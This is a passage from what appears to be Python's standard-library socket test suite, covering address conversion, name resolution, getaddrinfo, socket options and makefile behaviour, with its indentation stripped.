"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
